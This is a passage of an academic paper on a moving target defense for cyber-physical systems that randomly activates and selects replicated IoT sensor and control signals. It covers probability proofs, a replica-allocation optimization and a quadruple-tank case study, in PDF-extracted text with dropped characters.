guarantees than conventional ICS communication protocols, they are still susceptible to cyber- attacks. In particular, a sophisticated adversary that knowsthe encryption key of one of the replicas could imperson- ate the replica and publish false information. Furthermore, an attacker that knows the encryption keys and ID could sub- scribe to a speci c topic and eavesdrop information [28]. Therefore, our proposed MTD-IDR strategy can help to mit-igate the impact of these sophisticated attackers by adding two layers of uncertainty that make the data intermittent, such that eavesdroppers would only capture incomplete information,and also would reduce the amount of false data reaching its destination. Fig. 2. Illustration of two uncertainty layers introduced by the proposed MTD-IDR. (a) Eavesdropper that intercepts one of the replica gathers incom-plete information. (b) Injected malicious data are not always selected by the random path selection algorithm, limiting the impact of the attack in the system operation. C. Random Replica Activation The MTD-IDR framework integrates the rst layer of uncer- tainty for attackers by the random transmission of replicated data as depicted in Fig. 2(a). Using this approach, if an adver- sary compromises a speci c communication link, the sensormeasurements or control commands they receive are going to be incomplete. Theorem 1 analytically calculates the level and the upper bound of uncertainty fed to the communicationnetwork as a result of the random replica activation algorithm. The analysis is performed on sensor signals, denoted as y i,b u t the results are the same for control commands. Theorem 1: Consider a CPS with the proposed MTD-IDR framework. Suppose that an adversary is able to intercept the data transmitted by the lth replica of the sensor measure- ment yi.L e t ns,ibe the number of replicas associated with theith sensor reading, then the probability that the lth replica is transmitted such that the adversary receives new information is given by pl Ts,i=2ns,i 1 2ns,i 1. (1) Consequently, the random replica activation layer can limit the information intercepted by an adversary up to 50%. Proof: Suppose that for sensor signal yi, there are ns,i available replicas shown by yr i={yr1 i,yr2 i,..., yrns,i i}.L e t Ii={1,2,..., ns,i}denote the set of all replicas for sen- soriand let Ir ibe the set of all possible combinations of the elements of Ii. For instance, if Ii={1,2,3}, then Ir i={1,2,3,{1,2},{1,3},{2,3},{1,2,3}}.A tt h e kth sam- pling instant, only a subset of replicas with indices de nedbyI tr i(k)transmit information, where Itr i(k) Ir i. The replica Itr i(k)is randomly selected from the set Ir iwith probability [1/(2ns,i 1)], which is determined by the size of Ir i.F o r each sensor i, the group of replicas transmitted is de ned by the vector ytr i={yrj i yr i|j Itr i(k)}, such that ytr i yr i. As the replica activation layer randomly selects the replicas to transmit, data are not always available in each speci c com- munication channel, causing adversaries that gained access toa single channel to capture incomplete data. Given that the probability distribution of all subsets of replicas is uniform Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:16 UTC from IEEE Xplore. Restrictions apply. 13226 IEEE INTERNET OF THINGS JOURNAL, VOL. 9, NO. 15, 1 AUGUST 2022 (i.e., the probabilities that a speci c subset of Ir iis selected are the same), then the probability that lth replica of sensor i is transmitted is given by pTs,i=Pr[Itr i(k)={l}]+Pr[Itr i(k)= {l,l+1}]+ + Pr[Itr i(k)=1,2,..., ns,i]. The number of index subsets of Ir ithat contain index lis 2ns,i 1. Therefore, we have that pl Ts,i=2ns,i 1/2ns,i 1, which calculates (1). Note that if ns,i=1, then pTs,i=1; for ns,i=2,pTs,i=2/3. On the limit, lim ns,i pTs,i=1/2, which indicates that the replica activation layer can limit the information interceptedby an adversary by up to 50%. D. Random Path Selection The proposed MTD-IDR framework integrates the second layer of uncertainty for attackers through the selection of trans- mitted signals by the random path selection algorithm. The main goal of the random path selection algorithm is to decreasethe possibility that malicious data reach its intended destina- tion. If an attacker is able to corrupt any of the replicated signals, the probability that the corrupted signal is selected by the random path selection algorithm decreases with the number of available replicas. This, in return, reduces the impact of anFDI attacks in the system operation [see Fig. 2(b)]. The follow- ing theorem (Theorem 2) analytically calculates the probability that malicious data are selected by the path selection algorithmand reaches the controller. Theorem 2: Consider the MTD-IDR framework with two layers of uncertainties introduced by random replica activationand random path selection layers. Suppose that an adversary is able to inject false data only to one active replica of sensor i. If the number of replicas of sensor iisn s,i, then the probability that the attack will reach the controller is given by ps,i=1 ns,i. (2) Similarly, pu,j=1/nu,jdenotes the probability that an attacked replica of the jth control command reaches the physical system. Proof: Let Jsel i(k) Itr i(k)be the index of replica that is randomly selected by the path selection algorithm.Since I tr i(k) Ir i, and set Ir iis composed of subsets of different sizes up to size ns,i, probability that replica lof sen- soriis selected by the random path selection algorithm is given by Pr/bracketleftBig Jsel i(k)=l/bracketrightBig =Pr/bracketleftbig Itr i(k)=l/bracketrightbig +Pr/bracketleftbig Itr i(k)={l,l+1}/bracketrightbig 2 +Pr/bracketleftbig Itr i(k)={1,l}/bracketrightbig 2+ +Pr/bracketleftbig Itr i(k)={1,2,..., ns,i}/bracketrightbig ns,i. (3) Note that the number of subsets of size tinIr ithat contains lis given by/parenleftbigns,i 1 t 1/parenrightbig . Also, the number of all subsets that contain lis 2ns,i 1. Therefore, we can rewrite (3) as follows: Pr/bracketleftBig Jsel i(k)=l/bracketrightBig =1 2ns,i 1 ns,i 1/summationdisplay t=0/parenleftbigns,i 1 t/parenrightbig t+1 . (4)Expanding the term inside the summation /parenleftbigns,i 1 t/parenrightbig t+1=/parenleftbig ns,i 1/parenrightbig !/parenleftbig ns,i 1 t/parenrightbig !t!1 t+1=1 ns,i/parenleftbiggns,i t+1/parenrightbigg (5) such that ns,i 1/summationdisplay t=0/parenleftbiggns,i t+1/parenrightbigg =ns,i/summationdisplay t=0/parenleftbiggns,i t/parenrightbigg 1. (6) Using/summationtextn k=0/parenleftbign k/parenrightbig =2n,w eh a v e Pr/bracketleftBig Jsel i(k)=l/bracketrightBig =1 2n s,i 1 1 ns,i ns,i 1/summationdisplay t=0/parenleftbiggns,i t/parenrightbigg 1 =1 ns,i. (7) The exact procedure applies for replicas of control com- mands. This concludes the proof. III. O PTIMAL REPLICA ALLOCATION MODEL We discussed in Section II that the proposed MTD-IDR framework adds two layers of uncertainties that depend on the number of replicas associated to each signal. Given that the number of replicas is limited to the number of available IoT devices, it is necessary to strategically allocate them in order to maximize their bene ts. Particularly, this allocation dependson the dynamic behavior and control architecture of the physi- cal system. For instance, a control system can be more sensible to changes in a speci c sensor readings; therefore, more IoTdevices should replicate that particular sensor. The proposed allocation methodology exploits some tools from control the- ory and optimization for linear-time-invariant systems (LTI)approximations, to nd the best combination of IoT replicas that minimizes the impact of an attack in terms of the devia- tion of the CPS from its normal operation. The design solutionwill inherently affect also the capability for the adversary to gather accurate information about the system behavior. A. Linear-Time System Model and Control Many physical systems have a dynamic behavior that depend on process variables in a nonlinear manner. As a consequence, nonlinear models can be linearized in order to analyze stability or design controllers using classical linearsystem techniques. Typically, linearized models are relatively accurate in a region near the nominal condition, and can be represented by a set of differential (or difference) equationsthat capture their dynamical behavior. Linear approximations provide insights on the system s response to disturbances or changes in the control input [29], making them suitable foranalyzing the impact of cyberattacks. This article utilizes the following linear system representation to model the underlying physical system of the CPS: x(k+1)=Ax(k)+B/tildewideu(k) y(k)=Cx(k) (8) where at each ktime sample, x(k) Xis the vector of size nthat represents the system states (e.g., temperature, velocity, Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:16 UTC from IEEE Xplore. Restrictions apply. GIRALDO et al. : MOVING TARGET DEFENSE FOR CYBER PHYSICAL SYSTEMS 13227 pressure, etc.), u(k) Uis the vector of size mthat represents the control inputs (e.g., valve position, acceleration, steeringangle, etc.), and /tildewideu(k)is computed by the MTD-IDR asso- ciated to the control command signals. Matrices A R n n and B Rn mindicate how the current states and control action will affect the future states, and matrix C Rp nrelates the system states and the sensor measurements. Since not all states in a system are measurable, it is common practice to usestate observers (e.g., the Kalman lter) in order to estimate the observable states and take adequate control actions [30]. For simplicity, we consider the steady-state Kalman lter of theform x(k+1)=A x(k)+Bu(k)+L/parenleftbig /tildewidey(k) C x(k)/parenrightbig (9) where x(k)corresponds to the estimated states, /tildewidey(k)corre- sponds to the MTD-IDR output with respect to the sensorreadings, and Lis the Kalman lter gain designed to mini- mize the state estimation error e(k)=x(k) x(k). Therefore, the controller action can be de ned by the following equation: u(k)=K x(k) (10) where Kis the control gain that is designed to guarantee that the system states remain around some desired opera- tion. The design of Kcan be carried out using the pole placement approach, Lyapunov stability, or by solving the linear quadratic regulator (LQR) problem. B. Decreasing Attack Impact One of the main challenges when protecting CPSs from cyber threats is that predicting the attacker s action is infeasi-ble. Several works de ne defense strategies for very speci c attack vectors, but lack the generality necessary in real applica- tions where the attacker action is unknown. Murguia et al. [31] have introduced a methodology to quantify the impact of unknown attacks, only under the assumption that they are bounded. The idea is based on the approximation of the attacker s reachable set, which is de ned as follows. De nition 1 (Attacker s Reachable Set): For a given initial state x0, the attacker s reachable set Racorresponds to the set of states x Xthat can be reached starting from x0byany arbitrary attack sequence (1), (2) ,..., where each input is bounded by min (k) max. Computing the exact reachable set Rais computationally intractable for systems whose states belong to the real space,i.e.,x(k) R n; however, there are tools from control theory to nd ellipsoids that contain the reachable set. An ellipsoid can be mathematically represented in a vector form as E(Q)=/braceleftBig x Rn|x/latticetopQ 1x 1/bracerightBig . Therefore, if we nd an ellipsoid that contains the reachable set [i.e., Ra E(Q)], then reducing the volume of the ellipsoid E(Q)will also reduce the attacker s reachable set. Based on these ideas, we extend the results in [31] to allocate the number of replicas in such a way the volume of Radecreases. Suppose that an adversary is able to inject false data to thelth replica, such that yrl i(k)=yi(k)+ y,i(k), where y,i(k) denotes the attacker s action. However, due to the random pathselection algorithm, yrl i(k)may not be selected to reach the controller. As a consequence, the signal that is used by thecontroller can be written as /tildewidey i(k)=yi(k)+ y,i(k) y,i(k) (11) where y,i(k)=1 if the compromised replica is selected by the random path selection algorithm at the instant kand 0 otherwise. Note that when there is no attack, /tildewideyi(k)=yi(k), which implies that the system performance is not affected by the proposed MTD strategy. Similarly, for the controller, /tildewideui(k)=ui(k)+ u,i(k) u,i(k). y,i(k), u,i(k)can be mod- eled as Bernoulli random variables with probabilities ps,i and pu,i, respectively. The group of sensor readings and control commands selected by the random path selection algorithm can be represented in compact form as /tildewidey(k)= y(k)+/Theta1y(k) y(k)and/tildewideu(k)=u(k)+/Theta1u(k) u(k), respec- tively, with /Theta1y(k)=diag( y,1(k),..., y,p(k))and/Theta1u(k)= diag( u,1(k),... , u,p(k)). Then, we de ne the extended vector z=[x/latticetop,e/latticetop]/latticetop, where e(k)=x(k) x(k). Combining (8) (10), a compact LTI representation is obtained as z(k+1)=Fz(k)+G(k) (k) (12) where F=/bracketleftbiggA+BK BK 0 A LC/bracketrightbigg G(k)=/bracketleftbiggB 0 B L/bracketrightbigg /bracehtipupleft/bracehtipdownright/bracehtipdownleft/bracehtipupright S/bracketleftbigg/Theta1u(k) 0 0 /Theta1y(k)/bracketrightbigg and =[ /latticetop u, /latticetop y]/latticetop.Note from (12) that G(k)depends on matrices composed by Bernoulli random variables. Therefore, the evolution of the system states becomes also random. In order to formulate the replica allocation problem, the expecta-tion of the system states at each instant kis considered. To this end, the expectation operator E[ ] is applied such that z(k)= E[z(k)]. Recall from Theorem 2 that p s,i=1/ns,iandpu,i= 1/nu,i. Therefore, if N=diag(nu,1,..., nu,m,ns,1,..., ns,m), then it is easy to show that E[G(k)]=SN 1, such that z(k+1)=F z(k)+SN 1 (k). The following theorem introduces the main design result to allocate the available replicas. Theorem 3: Consider the discrete-time LTI system described in (12) with the proposed MTD-IDR frame-work. The total number of available replicas for sensor and control signals is n sT pand nuT m, respectively. For a given a (0,1), if there exists a positive-de nite matrix Qand integer vectors ns=[ns,1,ns,2,..., ns,p] and nu=[nu,1,..., nu,m] solution of the following problem (Problem 1), formulated as an MIQCP problem: Problem 1 min Q,ns,nutr(Q) s.t.Q>0,ns,i 1,nu,j 1 p/summationdisplay i=1ns,i nsT Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:16 UTC from IEEE Xplore. Restrictions apply. 13228 IEEE INTERNET OF THINGS JOURNAL, VOL. 9, NO. 15, 1 AUGUST 2022 Fig. 3. QTP with two water level sensors and two dc pumps that are controlled by a dc voltage. m/summationdisplay i=1nu,i nuT aQ 0 QF/latticetop 0(1 a)NRN S/latticetop FQ S Q 0 then the number of replicas nsandnuare allocated to minimize the volume of the attacker s reachable set contained in the ellipsoid E(Q). Proof: The proof is straightforward, adapting the compu- tation of the reachable set introduced in [31], where tr (Q)is proportional to the volume of the ellipsoid E(Q). The solution of Problem 1 will provide matrix Qand the optimal allocation of IoT devices that minimizes the impact of cyberattack sequence. Note that positive semide nite and def-inite constraints in Problem 1 form closed convex cones [32]. Therefore, given that the objective function and constraints are convex, Problem 1 corresponds to a convex MIQCP, whichcan be solved using iterative algorithms based on branch & bound, gradient cuts, and outer approximation [33]. The con- vexity of the problem facilitates the computation of near-globalsolutions for large-scale systems [34]. IV . C ASE STUDY :QUADRUPLE TANK PROCESS In order to illustrate the potential bene ts of the proposed MTD-IDR framework, the QTP described in Fig. 3 is con- sidered [35]. The QTP has become a popular benchmark forresearchers as it involves four highly interconnected tanks having nonlinear characteristics. Also, the QTP system has a wide range of applications in process industries, such as petrochemicals, wastewater treatment and puri cation, and pharmaceutical industries among others [36]. Particularly, theQTP has been widely used for testing the impact of cyberat- tacks in feedback control systems [37]. The process consists of four tanks, two pumps, and two water sensors, where the maingoal is to control the water level in the lower two tanks by controlling the amount of water injected by the pumps. Whatmakes this process complex is the cross interaction among the upper tanks, the lower tanks, and the pumps. In particular, ifPump 1 increases its water inlet ow (increase in the dc volt- age of the pump), it will increase the water level of Tanks 1 and 4; at the same time, since the level of water in Tank 4 isincreasing, it will affect the water owing from Tanks 2 to 4. The same happens with Pump 2 and Tanks 1 3. In addition, Valves 1 and 2 are xed and they determine which portion ofthe pumped water ows to both, Tanks 1 and 4 (resp. Tanks 2 and 3) according to some parameter 1, 2, where i (0,1). For instance, if 1=0.3, that means that 30% of the pumped water from Pump 1 will go to Tank 1 and 70% to Tank 4. The nonlinear equations obtained from a mass balance analysis are described in detail in [35]. The controller and state estimation used in this work are designed based on a discretized model of the linear approximation derived in [35]. A. QTP and MTD-IDR Implementation The experimentation environment for implementing the proposed MTD-IDR integrates IoT devices to replicate sen- sor signals, and Python scripts that represent the controller,state estimation and dynamics of the QTP. The IoT replicas are developed in C ++, and compiled and executed on a Linux operating system. The IoT devices in the implementation areOdroid XU4 devices with ARM cortex octa core CPU proces- sor and 2-GB high speed RAM. These devices are both low cost and have needed processing and network powers for datareplication and random replica activation. Problem 1 has been solved using the BMIBNB solver in YALMIP [38], which uses an approach based on the branch & bound algorithm with nonlinear cuts that can rapidly nd a feasible solution. In particular, using the discrete-time approximation of the QTPforn sT=5 and nuT=5, we found that the optimal num- ber of replicas is ns=[1,4] and nu=[3,2]. The proposed mechanism can be implemented in any low-cost, opensource,and off-the-shelf single-board computer (SBC) with a network interface card, where the DDS RTPS packets are exchanged. These types of SBCs have a price range of about U.S. $30 toU.S. $80, for which the monetary investment for the proposed MTD is low in contrast with its bene ts. Fig. 4 shows the network architecture implemented via the data distribution service (DDS) middleware using the DDS API provided by RTi Connext DDS [39]. Within the network, the DDS institutes a global data space (GDS), i.e.,the databus, and makes it available to all applications that authenticate themselves on the network. GDS1 represents the interface over which the replicas receive signals, and GDS2represents the control network where replicas send back their replicated signals. Entities shown as circles in the GDSs are called topics. In the implementation, there are four topics named Control Data, Sensor Data, Control Replicas, and Sensors Replicas. Each of theses four topics has anassociated data type, as shown in Fig. 4. Applications have publishers that write data to the databus and subscribers that reads data from it. Whenever a publisher writes new data,the DDS middleware disseminates the updated instance of that data to all subscribers. Applications, therefore, interact Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:16 UTC from IEEE Xplore. Restrictions apply. GIRALDO et al. : MOVING TARGET DEFENSE FOR CYBER PHYSICAL SYSTEMS 13229 Fig. 4. DDS network architecture. by updating instances of this data item. The arrows connecting applications to topics in Fig. 4 represent the logical relations between the publishers/subscribers of each application and the data items within the topics. In this implementation, sensors share information with their respective replicas by updating keyed instances of theSensor_Data object associated to the Sensor Data topic. That is, all sensors share the same data model, but use their assigned IDs as keys to update distinct instances of the Sensor_datadata model. On the other hand, sensor replicas subscribe to the Sensor Data topic, and each replica lters the data in this topic to only receive the values with the key associated to thesensor it is replicating (e.g., replicas of sensor 1 will lter the data in the Sensor Data topic using the key ID =1). In their turn, each sensor replica then writes the data it received backto the Sensor Replicas topic with the replica ID, R_ID, as its key. The controller then subscribes to the Sensor Replicas topic and the random path selection algorithm selects one sig-nal to generate the control commands. The same applies to the Controller Replicas. Through this implementation (i.e., interacting with data objects), the sensors, controllers, and their replicas presented are decoupled. Therefore, the system is highly scalable and the number of replicas could be dynamically changed (increased or decreased). B. Decreasing the Attacker s Estimation Capabilities We consider an adversary that intercepts the data of one replica per sensor and per actuator. The data can be used to learn important properties that will enable the design of stronger and even stealthy attacks. For instance, if the adver-sary is able to accurately estimate the system model, they can learn how their attacks will affect the system, and then,(a) (b) Fig. 5. Attacker s system estimation of level sensor 1 for different model estimation strategies (a) with the proposed MTD and (b) without MTD. TABLE I ATTACKER SESTIMATION ACCURACY WITH AND WITHOUT MTD carefully tailor attack sequences that could remain stealthy or reach a speci c goal, as it was pointed out in [19] and [31]. Also, a model can provide information about the sensitiv- ity of the system to certain frequencies, or can be used toreverse engineer the control algorithm. In order to illustrate how the MTD-IDR can limit the model estimation capabilities of the attacker, three common system identi cation meth-ods are tested, namely, autoregressive models (ARX), transfer function estimation, and state-space estimation. Each of these methods possess a speci c structure, where unknown param-eters are estimated such that the minimum mean square error (mmse) with respect to the collected data is minimized. The data are obtained from the two sensors and two control com-mands of the QTP during normal operation. According to Theorem 1, the probabilities that the adversary will receive new data from sensor and control signals are p Ts=[1,0.533] andpTu=[0.5714,0.667], respectively. We assume that when the information is not transmitted due to the replica activa- tion algorithm, the adversary uses the previous data. Table I and Fig. 5 show the model estimation accuracy with and with- out the proposed MTD-IDR. Clearly, having incomplete dataaffects attacker s estimation capacity.. C. Decreasing the Impact of Successful Attacks The second uncertainty layer helps to limit successful FDI attacks in sensors and control commands. An attacker isassumed to gain access to sensor and control commands simul- taneously and inject a bias attack. Fig. 6(a) depicts the water level deviation in all tanks without MTD and with a bias attack y=[1, 1]/latticetopand u=[1, 1]/latticetop. The bias attack causes a signi cant deviation of the water level. On the other hand, withthe proposed MTD-IDR, we assume the attacker gains access to one replica per sensor and one replica per control command (i.e., gains access to four replicas in total). Due to the randomnature of the MTD, 25 experiments were performed starting in the same initial conditions. Fig. 6(b) shows the Monte Carlo Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:16 UTC from IEEE Xplore. Restrictions apply. 13230 IEEE INTERNET OF THINGS JOURNAL, VOL. 9, NO. 15, 1 AUGUST 2022 (a) (b) (c) Fig. 6. (a) Deviation in the water level caused by a bias attack that affect the sensor signals and control commands without MTD. (b) Proposed MTD- IDR limits signi cantly the water deviation. (c) Norm of the water level of all tanks without MTD, with MTD-IDR, and with E-MTD proposed in [21].The MTD-IDR outperforms E-MTD by guaranteeing faster convergence andlarger attack limitation. simulation of the water level. Note that the impact of the attack is signi cantly smaller than without MTD. The MTD-IDR is compared with the entropy-based MTD (E-MTD) mechanism proposed in [21]. The E-MTD approachconsists of switching among different combination of actua- tors and sensors in order to increase the uncertainty perceived by an adversary. The E-MTD requires to carefully select theswitching probabilities and switching instants in order to guar- antee the system stability. Fig. 6(c) depicts norm of the water level at each time instant, i.e., /bardblx(t)/bardbl, using both MTD strate- gies. The switching probabilities of the E-MTD are chosen to be equal to p TsandpTu, such that both MTD strategies pro- vide the same level of uncertainty. The MTD-IDR does notaffect the performance of the system before the attack, con- trary to the E-MTD that induces a larger convergence time and undesired disturbances during the normal operation. Inaddition, MTD-IDR provides stronger security guarantees by signi cantly reducing the impact caused by cyberattacks in the water level deviation. Fig. 7(a) depicts the impact of the attack [i.e., tr (Q)], which is proportional to the volume of the attacker s reachable set with respect to the total number of replicas. By having ve replicas for sensors and control commands, the impact is reduced around 87%. Therefore, MTD-IDR can signi cantlylimit the attacks with a low investment of IoT devices. On the other hand, the random replica activation algorithm not only helps to limit the attacker s learning capabilities but also hasconsiderably lower bandwidth consumption by not transmit- ting all the replicated information simultaneously, as illustrated(a) (b) Fig. 7. (a) Impact of the attack (tr(Q))and (b) bandwidth consumption for different number of available replicas. Straight lines represent the expectedbandwidth consumption, and n T=nsT+nuT. TABLE II COMPARISON OF DIFFERENT MTD M ECHANISMS in Fig. 7(b), where the total bandwidth consumption changes over time, but it rarely uses the maximum capacity. Moreover,having intermittent data transmission also decreases the energy consumption, enhancing the scalability and feasibility of the MTD-IDR framework. Table II summarizes the performance of the proposed MTD- IDR when compared with two existing MTD mechanisms:1) E-MTD and 2) sensor-switching MTD (SS-MTD) intro- duced in [19] for the bias attack described above. For all approaches, the of ine computation time, latency, impactreduction, performance degradation, and average data avail- ability is computed. The of ine computation time is calculated based on the time it takes to compute the desired probabili-ties at which signals should switch. The E-MTD requires to solve four Ricatti equations, one for each sensor and each actuator; for the SS-MTD it is necessary to solve a nonconvexnonlinear optimization problem; for the proposed MTD-IDR it is necessary to solve Problem 1. The results are obtained using MATLAB in a computer with Intel Core i7-8550U CPU@ 1.80 and 1.99 GHz, and 32-GB of RAM. The of ine computation time of the E-MTD is signi cantly lower since there are many ef cient algorithms to solve Ricatti equations.The MTD-IDR and SS-MTD need to solve more complex optimization problems. However, the solution only needs to be found once, which does not affect the system operation. Network latency corresponds to the time it takes to all sen- sors and control signals to be replicated, sent, and receivedusing the DDS data bus (i.e., publish and subscribe). A detailed latency analysis was performed in [40]. Based on this anal- ysis, for our case study with ten replicas, network latency isapproximately 0.27 ms with a transmission rate of 100 msg/s and message size of approximately 326 Bytes. Therefore, DDS Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:16 UTC from IEEE Xplore. Restrictions apply. GIRALDO et al. : MOVING TARGET DEFENSE FOR CYBER PHYSICAL SYSTEMS 13231 does not induce a signi cant latency that can affect the system operation. For E-MTD and SS-MTD, authors did not provideany implementation results that illustrate the actual overhead of their solution. The impact reduction is computed by comparing the steady- state norm after the bias attack with and without MTD. The performance degradation is calculated based on the cumula- tive deviation of the states,/integraltext 0/bardblx( )/bardbld , with respect to the case without MTD. Note that the MTD-IDR has a signi cant impact reduction without any performance degradation, while for the other cases the performance degradation is large whencompared to their bene t in improving security. Finally, the average data availability is computed as the number of sen- sor data samples received by the controller with respect to the total number of data samples. Note that the MTD-IDR is the only one that guarantees 100% of data availability, whilethe other MTD approaches can only guarantee below 80%. For this particular case study, the stability of the system is not affected even when data are not always available; how-ever, other industrial systems can be severely affected when the data availability is below 99%. V. C ONCLUSION This article presented the novel MTD-IDR framework, which utilizes IoT-enabled data replication for MTD in CPSs. MTD-IDR utilizes linear-matrix inequalities to formulate an optimization problem for selecting the optimal number ofreplicas for each communicated signal in the system. Two algorithms were introduced that add two layers of uncer- tainties for attackers. The experimental results carried out in a real-time environment using the quadruple-tank pro- cess and a data-centric replication architecture showed thatMTD-IDR signi cantly reduces the attacker s accuracy in learning the system s model, and therefore, hinders the cre- ation of stealthy attacks. Furthermore, it drastically reducedthe impact of successful FDI attacks in the physical system and it outperformed the E-MTD strategy without degrading the normal system performance. In particular the results showedthat having ve replicas distributed among the two sensors and ve replicas allocated among the two control command signals, it is possible to reduce about 87% of the attackimpact. Additionally, MTD-IDR does not affect the stability or performance of the controlled CPS; therefore, unaltering the nominal operation of the physical system. The resultsalso illustrated the scalability and seamless integration of the proposed IoT-enabled replication approach obtained with the data-centric architecture. Moreover, the random replicaactivation reduces the overall bandwidth and energy con- sumption given that only a subset of replicas transmits data simultaneously. While MTD-IDR proved effective for enhancing the security and resiliency of CPSs against FDI attacks, future direc-tions include optimizing network resources (e.g., dynamic bandwidth allocation) by incorporating metrics from the com- munication network into the constraints of Problem 1, andextending the random path selection algorithm to include anomaly detection and removal of malicious data.R EFERENCES [1] J. Giraldo, E. Sarkar, A. A. Cardenas, M. Maniatakos, and M. Kantarcioglu, Security and privacy in cyber-physical systems:A survey of surveys, IEEE Design Test , vol. 34, no. 4, pp. 7 17, Aug. 2017. [2] A. Humayed, J. Lin, F. Li, and B. Luo, Cyber-physical systems security A survey, IEEE Internet Things J. , vol. 4, no. 6, pp. 1802 1831, Dec. 2017. [3]2019 Year in Review: ICS Vulnerabilities , Dragos, Hanover, MD, USA, 2019. [4] Defense Use Case, Analysis of the Cyber Attack on the Ukrainian Power Grid , vol. 388, Electricity Inf. Sharing Anal. Center (E-ISAC), Washington, DC, USA, 2016. [5] Security: First-of-a-Kind U.S. Grid Cyberattack Hit Wind, Solar. 2019. [Online]. Available: https://www.eenews.net/stories/1061421301 [6] M. Uma and G. Padmavathi, A survey on various cyber attacks and their classi cation, Int. J. Netw. Security , vol. 15, no. 5, pp. 390 396, 2013. [7] R. E. Navas, F. Cuppens, N. B. Cuppens, L. Toutain, and G. Z. Papadopoulos, MTD, where art thou? A systematic review ofmoving target defense techniques for IoT, IEEE Internet Things J. , vol. 8, no. 10, pp. 7818 7832, May 2021. [8] C. Lei, H.-Q. Zhang, J.-L. Tan, Y .-C. Zhang, and X.-H. Liu, Moving tar- get defense techniques: A survey, Security Commun. Netw. , vol. 2018, Jul. 2018, Art. no. 3759626. [9] M. Torquato and M. Vieira, Moving target defense in cloud computing: A systematic mapping study, Comput. Security , vol. 92, May 2020, Art. no. 101742. [10] F. Nizzi, T. Pecorella, F. Esposito, L. Pierucci, and R. Fantacci, IoT security via address shuf ing: The easy way, IEEE Internet Things J. , vol. 6, no. 2, pp. 3764 3774, Apr. 2019. [11] B. Potteiger, Z. Zhang, and X. Koutsoukos, Integrated data space randomization and control recon guration for securing cyber-physical systems, in Proc. 6th Annu. Symp. Hot Topics Sci. Security , 2019, pp. 1 10. [12] B. Potteiger, Z. Zhang, and X. Koutsoukos, Integrated moving tar- get defense and control recon guration for securing cyber-physical systems, Microprocess. Microsyst. , vol. 73, Mar. 2020, Art. no. 102954. [13] A. C. Pappa, A. Ashok, and M. Govindarasu, Moving target defense for securing smart grid communications: Architecture, implementation & evaluation, in Proc. IEEE Power Energy Soc. Innov. Smart Grid Technol. Conf. (ISGT) , Washington, DC, USA, 2017, pp. 1 5. [14] S. Woo, D. Moon, T.-Y . Youn, Y . Lee, and Y . Kim, CAN ID shuf- ing technique (CIST): Moving target defense strategy for protecting in-vehicle can, IEEE Access , vol. 7, pp. 15521 15536, 2019. [15] Z. Zhang, R. Deng, D. K. Y . Yau, P. Cheng, and J. Chen, Analysis of moving target defense against false data injection attacks on power grid, IEEE Trans. Inf. Forensics Security , vol. 15, pp. 2320 2335, 2020. [16] B. Liu and H. Wu, Optimal D-FACTS placement in moving target defense against false data injection attacks, IEEE Trans. Smart Grid , vol. 11, no. 5, pp. 4345 4357, Sep. 2020. [17] S. Lakshminarayana, E. V . Belmega, and H. V . Poor, Moving-target defense against cyber-physical attacks in power grids via game theory, IEEE Trans. Smart Grid , vol. 12, no. 6, pp. 5244 5457, Nov. 2021. [18] M. Higgins, F. Teng, and T. Parisini, Stealthy MTD against unsuper- vised learning-based blind FDI attacks in power systems, IEEE Trans. Inf. Forensics Security , vol. 16, pp. 1275 1287, 2020. [19] J. Giraldo, A. Cardenas, and R. G. Sanfelice, A moving target defense to detect stealthy attacks in cyber-physical systems, in Proc. Amer. Control Conf. (ACC) , Philadelphia, PA, USA, 2019, pp. 391 396. [20] J. Giraldo and A. A. Cardenas, Moving target defense for attack mit- igation in multi-vehicle systems, in Proactive and Dynamic Network Defense . Cham, Switzerland: Springer Int., 2019, pp. 163 190. [21] A. Kanellopoulos and K. G. Vamvoudakis, A moving target defense control framework for cyber-physical systems, IEEE Trans. Autom. Control , vol. 65, no. 3, pp. 1029 1043, Mar. 2020. [22] J. Tian, R. Tan, X. Guan, Z. Xu, and T. Liu, Moving target defense approach to detecting stuxnet-like attacks, IEEE Trans. Smart Grid , vol. 11, no. 1, pp. 291 300, Jan. 2020. [23] P. Grif oen, S. Weerakkody, and B. Sinopoli, A moving target defense for securing cyber-physical systems, IEEE Trans. Autom. Control , vol. 66, no. 5, pp. 2016 2031, May 2021. [24] A. O. Hariri, M. El Hariri, T. Youssef, and O. A. Mohammed, A bilateral decision support platform for public charging of connected elec-tric vehicles, IEEE Trans. Veh. Technol. , vol. 68, no. 1, pp. 129 140, Jan. 2019. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:16 UTC from IEEE Xplore. Restrictions apply. 13232 IEEE INTERNET OF THINGS JOURNAL, VOL. 9, NO. 15, 1 AUGUST 2022 [25] Data Distribution Service (DDS). [Online]. Available: https://www.omg.org/omg-dds-portal/ (accessed Sep. 22, 2020). [26] Y . Xu, Y . Yang, T. Li, J. Ju, and Q. Wang, Review on cyber vulnerabil- ities of communication protocols in industrial control systems, in Proc. IEEE Conf. Energy Internet Energy Syst. Integr. (EI2) , Beijing, China, 2017, pp. 1 6. [27] Z. Drias, A. Serhrouchni, and O. V ogel, Taxonomy of attacks on indus- trial control protocols, in Proc. Int. Conf. Protocol Eng. (ICPE) Int. Conf. New Technol. Distrib. Syst. (NTDS) , Paris, France, 2015, pp. 1 6. [28] R. M. Abdulghani, M. M. Alrehili, A. A. Almuhanna, and O. H. Alhazmi, Vulnerabilities and security issues in IoT protocols, in Proc. 1st Int. Conf. Smart Syst. Emerg. Technol. (SMARTTECH) , Riyadh, Saudi Arabia, 2020, pp. 7 12. [29] D. E. Seborg, D. A. Mellichamp, T. F. Edgar, and F. J. Doyle III, Process Dynamics and Control . Hoboken, NJ, USA: Wiley, 2010. [30] F. Auger, M. Hilairet, J. M. Guerrero, E. Monmasson, T. Orlowska-Kowalska, and S. Katsura, Industrial applications ofthe Kalman lter: A review, IEEE Trans. Ind. Electron. , vol. 60, no. 12, pp. 5458 5471, Dec. 2013. [31] C. Murguia, I. Shames, J. Ruths, and D. Ne i c, Security metrics and synthesis of secure control systems, Automatica , vol. 115, May 2020, Art. no. 108757. 